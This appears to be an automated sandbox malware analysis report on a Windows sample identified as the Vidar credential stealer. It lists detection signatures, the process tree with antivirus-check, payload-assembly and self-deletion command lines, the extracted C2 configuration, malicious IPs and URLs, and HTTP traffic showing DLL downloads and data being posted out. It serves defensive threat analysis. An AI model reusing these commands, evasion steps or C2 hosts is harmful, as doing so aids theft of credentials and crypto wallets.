Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483190
MD5: 569720e2c07b1d34bac1366bf2b1c97a
SHA1: d0c7109e04b413f735bf034ce2cb2f8ee9daa837
SHA256: 0df79273aea792b72c2218a616b36324e31aaf7da59271969a23a0c392f58451
Tags: exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 569720E2C07B1D34BAC1366BF2B1C97A)
    • cmd.exe (PID: 2020 cmdline: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6192 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5428 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 3148 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2796 cmdline: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4052 cmdline: cmd /c md 447331 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4408 cmdline: findstr /V "typesfaxincreasecompound" Ensemble MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3288 cmdline: cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Buyer.pif (PID: 2380 cmdline: Buyer.pif p MD5: 848164D084384C49937F99D5B894253E)
        • cmd.exe (PID: 4052 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6180 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 4672 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
Source: sslproxydump.pcap, Rule: JoeSecurity_Vidar_2, Description: Yara detected Vidar, Author: Joe Security
Source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 11.2.Buyer.pif.1354718.1.raw.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 11.2.Buyer.pif.1354718.1.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: 11.2.Buyer.pif.40f0000.6.unpack, Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Author: Joe Security
Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: Buyer.pif p, CommandLine: Buyer.pif p, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2020, ParentProcessName: cmd.exe, ProcessCommandLine: Buyer.pif p, ProcessId: 2380, ProcessName: Buyer.pif

                    HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2020, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 2796, ProcessName: findstr.exe
                    No Snort rule has matched
Timestamp: 2024-07-26T19:58:18.595071+0200, SID: 2051831, Source Port: 443, Destination Port: 49715, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-26T19:58:48.364414+0200, SID: 2028765, Source Port: 49733, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:17.933745+0200, SID: 2028765, Source Port: 49715, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:40.259772+0200, SID: 2028765, Source Port: 49728, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:28.934319+0200, SID: 2028765, Source Port: 49722, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:16.599098+0200, SID: 2028765, Source Port: 49714, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:25.836622+0200, SID: 2028765, Source Port: 49720, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:34.371651+0200, SID: 2028765, Source Port: 49725, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:47.016652+0200, SID: 2028765, Source Port: 49732, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:29.673364+0200, SID: 2011803, Source Port: 443, Destination Port: 49722, Protocol: TCP, Classtype: Executable code was detected
Timestamp: 2024-07-26T19:58:42.938290+0200, SID: 2028765, Source Port: 49730, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:41.583181+0200, SID: 2028765, Source Port: 49729, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:39.089459+0200, SID: 2028765, Source Port: 49727, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:49.953417+0200, SID: 2054495, Source Port: 49734, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T19:58:27.179495+0200, SID: 2028765, Source Port: 49721, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:30.758808+0200, SID: 2028765, Source Port: 49723, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:23.676169+0200, SID: 2028765, Source Port: 49718, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:15.923488+0200, SID: 2049087, Source Port: 49711, Destination Port: 443, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T19:58:19.322610+0200, SID: 2028765, Source Port: 49716, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:17.256726+0200, SID: 2044247, Source Port: 443, Destination Port: 49714, Protocol: TCP, Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-26T19:58:22.600438+0200, SID: 2011803, Source Port: 443, Destination Port: 49717, Protocol: TCP, Classtype: Executable code was detected
Timestamp: 2024-07-26T19:58:15.159939+0200, SID: 2028765, Source Port: 49711, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:45.001633+0200, SID: 2028765, Source Port: 49731, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:13.854105+0200, SID: 2028765, Source Port: 49707, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:12.758336+0200, SID: 2028765, Source Port: 49705, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:20.614117+0200, SID: 2028765, Source Port: 49717, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:35.938833+0200, SID: 2028765, Source Port: 49726, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:32.652835+0200, SID: 2028765, Source Port: 49724, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic
Timestamp: 2024-07-26T19:58:52.838130+0200, SID: 2022930, Source Port: 443, Destination Port: 49735, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T19:58:14.504211+0200, SID: 2022930, Source Port: 443, Destination Port: 49706, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T19:58:24.742835+0200, SID: 2028765, Source Port: 49719, Destination Port: 443, Protocol: TCP, Classtype: Unknown Traffic


                    AV Detection

Source: https://5.75.212.60/sqls.dll, Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges, Avira URL Cloud: Label: malware
Source: https://t.me/armad2a, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dlli, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/H, Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/mozglue.dll, Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/nss3.dll, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dll, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/msvcp140.dll, Avira URL Cloud: Label: malware
Source: https://5.75.212.60/nss3.dll=, Avira URL Cloud: Label: malware
Source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
Source: Submited Sample, Integrated Neural Analysis Model: Matched 98.8% probability
Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Buyer.pif, 0000000B.00000002.2554138012.000000002B617000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Buyer.pif, 0000000B.00000002.2549888344.000000001F737000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Buyer.pif, 0000000B.00000002.2561551186.000000006C60F000.00000002.00000001.01000000.00000008.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Buyer.pif, 0000000B.00000002.2541666136.000000000C8B8000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FAE1AC GetFileAttributesW,FindFirstFileW,FindClose,11_2_00FAE1AC
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FAD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD98E
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FBA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00FBA29A
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FB6406 FindFirstFileW,FindNextFileW,FindClose,11_2_00FB6406
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00F7C5F3 FindFirstFileExW,11_2_00F7C5F3
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FB70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00FB70FE
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FB705D FindFirstFileW,FindClose,11_2_00FB705D
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FAD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00FAD65B
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FB9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9DB1
Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif, Code function: 11_2_00FB9F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00FB9F0C
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\447331
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\447331\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\

                    Networking

                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199747278259
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 77.91.101.71 77.91.101.71
                    Source: Joe Sandbox ViewIP Address: 5.75.212.60 5.75.212.60
                    Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 6129Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 465 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 130941 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
